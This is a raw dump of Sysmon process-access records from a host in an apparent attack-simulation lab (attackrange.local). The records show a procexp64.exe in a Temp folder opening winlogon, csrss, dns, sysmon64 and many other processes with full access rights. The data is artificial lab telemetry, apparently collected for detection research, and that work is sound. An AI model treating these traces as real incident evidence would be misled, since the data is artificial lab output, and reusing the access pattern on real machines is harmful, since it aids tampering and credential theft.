15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 